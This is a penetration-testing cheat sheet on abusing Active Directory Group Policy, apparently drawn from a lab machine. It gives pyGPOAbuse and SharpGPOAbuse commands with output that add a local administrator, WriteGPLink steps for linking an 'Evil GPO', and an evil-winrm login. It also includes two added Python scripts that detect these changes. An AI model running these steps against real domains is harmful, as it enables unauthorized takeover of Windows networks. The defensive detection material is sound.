General
1. Install GPMC [Optional]
# Run as Administrator
Install-WindowsFeature GPMC
Sample Output:
PS C:\Windows\system32> Install-WindowsFeature GPMC
Install-WindowsFeature GPMC
Success Restart Needed Exit Code Feature Result
------- -------------- --------- --------------
True No Success {Group Policy Management}
2. List GPO Names
# List all GPOs
Get-GPO -All | Select-Object DisplayName
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName
DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO
# Check GPO by name
Get-GPO -Name '<GPO_NAME>'
Sample Output:
TO-DO
# Generate XML report
Get-GPOReport -Name '<GPO_NAME>' -ReportType XML
Sample Output:
TO-DO
# Generate pretty HTML report
Get-GPOReport -Name '<GPO_NAME>' -ReportType HTML -Path "C:\ProgramData\GPOReport.html"
Sample Output:
TO-DO
Abuse #1: Add Local Admin
1. Add Local Admin
# GPO ID is the GUID taken from the DN of the Default Domain Policy
python3 pygpoabuse.py <DOMAIN>/<USER>:<PASSWORD> -gpo-id '<GPO_ID>'
Sample Output:
$ python3 pygpoabuse.py example.com/GPOADM:TestTest -gpo-id '31B2F340-016D-11D2-945F-00C04FB984F9'
SUCCESS:root:ScheduledTask TASK_2300c834 created!
[+] ScheduledTask TASK_2300c834 created!
2. Force Reload
gpupdate /force
Sample Output:
PS C:\programdata> gpupdate /force
gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
3. Check
net localgroup administrators
Sample Output:
PS C:\programdata> net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
john
The command completed successfully.
4. Winrm
evil-winrm -i <TARGET_DOMAIN> -u john -p 'H4x00r123..'
Sample Output:
TO-DO
Ref: pyGPOAbuse
1. Add Local Admin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount '<USER>' --GPOName '<GPO_NAME>'
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalADmin --UserAccount 'HHogan' --GPOName 'Default Domain Policy'
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
2. Force Reload
gpupdate /force
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
*Evil-WinRM* PS C:\Users\HHogan\Documents> net user HHogan
User name HHogan
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/6/2023 11:59:34 AM
Password expires Never
Password changeable 5/7/2023 11:59:34 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/10/2023 5:30:58 AM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users *GPO Managers
The command completed successfully.
Ref: SharpGPOAbuse
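Defender's check for Abuse #1 (added example, not code from pyGPOAbuse or SharpGPOAbuse): the SharpGPOAbuse run above rewrites GptTmpl.inf in SYSVOL so that a Restricted Groups entry pushes the user's SID into local Administrators. The script below parses the [Group Membership] section of such a file and reports members of privileged local groups that are not on an allowlist. The sample .inf, the allowlist (Domain Admins, RID 512) and the SID values are constructed for the example; the file path and UTF-16 encoding of the real GptTmpl.inf are stated as context, and the output lines of the tool are not reproduced.

```python
"""Audit the [Group Membership] section of a GptTmpl.inf for members that a
GPO pushes into privileged local groups (the change SharpGPOAbuse makes).

Added example for this page, not part of pyGPOAbuse or SharpGPOAbuse.
"""
import re

# Well-known SIDs of local groups whose membership a GPO should rarely alter.
PRIVILEGED_LOCAL_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-555": "Remote Desktop Users",
    "S-1-5-32-580": "Remote Management Users",
}

# Constructed sample modelled on the page's SharpGPOAbuse run: the Default
# Domain Policy's GptTmpl.inf after a Restricted Groups entry was added that
# makes one domain user (RID 1108) a member of local Administrators. The real
# file sits under ...\{GUID}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
# in SYSVOL and is UTF-16 encoded; decode it before passing it in.
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-1199398058-4196589450-691661856-1108
"""

# Constructed allowlist: only Domain Admins (RID 512) of this domain is
# expected to be pushed into local Administrators by policy.
ALLOWED_MEMBERS = {"S-1-5-21-1199398058-4196589450-691661856-512"}

# Restricted Groups keys look like *<group SID or name>__Members / __Memberof.
_KEY_RE = re.compile(r"\*?(?P<group>.+?)__(?P<attr>Members|Memberof)", re.IGNORECASE)


def parse_group_membership(inf_text):
    """Return {group: {"members": [...], "memberof": [...]}} for every
    Restricted Groups entry. A leading '*' marks a SID in the .inf syntax."""
    result, section = {}, None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "group membership" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        m = _KEY_RE.fullmatch(key.strip())
        if not m:
            continue
        members = [tok.strip().lstrip("*") for tok in value.split(",") if tok.strip()]
        entry = result.setdefault(m.group("group"), {"members": [], "memberof": []})
        entry[m.group("attr").lower()].extend(members)
    return result


def find_unexpected_members(inf_text, allowed=ALLOWED_MEMBERS):
    """Return (group name, member) pairs for members the GPO adds to a
    privileged local group that are not on the allowlist."""
    findings = []
    for group, entry in parse_group_membership(inf_text).items():
        if group not in PRIVILEGED_LOCAL_GROUPS:
            continue
        for member in entry["members"]:
            if member not in allowed:
                findings.append((PRIVILEGED_LOCAL_GROUPS[group], member))
    return findings


if __name__ == "__main__":
    for group, member in find_unexpected_members(SAMPLE_GPTTMPL):
        print(f"[!] GPO adds {member} to local {group}")
```

Run it over every Policies\{GUID}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf in SYSVOL on a schedule and alert on any finding; a GPT.ini version bump with no matching change record is a second signal that pairs well with it. The pyGPOAbuse variant above writes a scheduled task instead, so its artefact is a ScheduledTasks.xml under the GPO's Preferences folder rather than this file.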
Abuse #2: WriteGPLink
1. Create a New GPO
New-GPO -Name "Evil GPO"
Sample Output:
TO-DO
2. Link to Target
Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=<TARGET>,DC=<DOMAIN>,DC=<COM>"
Sample Output:
TO-DO
3. Add Local Admin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount '<USER>' --GPOName 'Evil GPO'
Sample Output:
TO-DO
4. Force Reload
gpupdate /force
Sample Output:
TO-DO
5. Check
net user '<USER>'
Sample Output:
TO-DO
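Defender's check for Abuse #2 (added example, not code from this page or its tools): linking a new GPO to an OU changes the OU's gPLink attribute, so a baseline of gPLink values per container, compared on a schedule, surfaces a GPO that was linked without change control. The script below parses gPLink values and diffs them against a baseline. All gPLink strings, the container DNs and the placeholder GUID AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE are constructed; on a real domain the values would be exported with, for example, Get-ADOrganizationalUnit -Filter * -Properties gPLink.

```python
"""Diff per-container gPLink values against a baseline to spot newly linked
GPOs (the change made by someone holding WriteGPLink on the OU).

Added example for this page, not part of any tool it mentions.
"""
import re

# One gPLink entry: [LDAP://cn={GUID},cn=policies,cn=system,DC=...;<options>]
# options bit 0 = link disabled, bit 1 = link enforced.
_LINK_RE = re.compile(
    r"\[LDAP://cn=\{(?P<guid>[0-9A-Fa-f-]{36})\}[^;\]]*;(?P<opts>\d+)\]",
    re.IGNORECASE,
)

# Constructed baseline: the well-known Default Domain Policy GUID linked at
# the domain root, nothing linked at the Workstations OU.
BASELINE_GPLINKS = {
    "DC=office,DC=htb": "[LDAP://cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=policies,cn=system,DC=office,DC=htb;0]",
    "OU=Workstations,DC=office,DC=htb": "",
}

# Constructed current state: an extra GPO (placeholder GUID) is now linked,
# and enforced, at the Workstations OU.
CURRENT_GPLINKS = {
    "DC=office,DC=htb": BASELINE_GPLINKS["DC=office,DC=htb"],
    "OU=Workstations,DC=office,DC=htb": "[LDAP://cn={AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE},cn=policies,cn=system,DC=office,DC=htb;2]",
}


def parse_gplink(gplink):
    """Return the links in a gPLink value as dicts with guid/disabled/enforced."""
    links = []
    for m in _LINK_RE.finditer(gplink or ""):
        opts = int(m.group("opts"))
        links.append({
            "guid": m.group("guid").upper(),
            "disabled": bool(opts & 1),
            "enforced": bool(opts & 2),
        })
    return links


def diff_gplinks(baseline, current):
    """Report every link in `current` whose GUID is not linked to the same
    container in `baseline`; containers absent from the baseline count as
    having no links."""
    findings = []
    for dn, gplink in current.items():
        known = {link["guid"] for link in parse_gplink(baseline.get(dn, ""))}
        for link in parse_gplink(gplink):
            if link["guid"] not in known:
                findings.append({"container": dn, **link})
    return findings


if __name__ == "__main__":
    for f in diff_gplinks(BASELINE_GPLINKS, CURRENT_GPLINKS):
        flag = "enforced" if f["enforced"] else "not enforced"
        print(f"[!] new GPO link {{{f['guid']}}} at {f['container']} ({flag})")
```

Resolving each new GUID to a display name (Get-GPO -Guid) and checking who holds write access on gPLink for that OU turns a finding into a ticket; the permission that made the link possible is the thing to remove.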